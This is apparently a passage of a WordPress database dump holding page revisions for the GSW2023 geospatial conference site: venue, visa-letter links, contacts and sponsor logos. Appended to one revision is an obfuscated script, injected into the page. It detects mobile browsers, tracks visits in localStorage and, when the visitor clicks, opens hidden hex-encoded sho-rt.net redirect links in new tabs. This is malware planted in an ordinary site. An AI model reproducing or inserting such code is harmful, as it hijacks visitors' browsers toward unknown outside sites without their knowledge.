2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 00:13:24','2023-08-16 00:13:24','',3066,'https://gsw2023.com/?p=5238',0,'revision','',0),
(5239,1,'2023-08-16 00:14:04','2023-08-16 00:14:04','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692141731943{margin-top: -15px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" 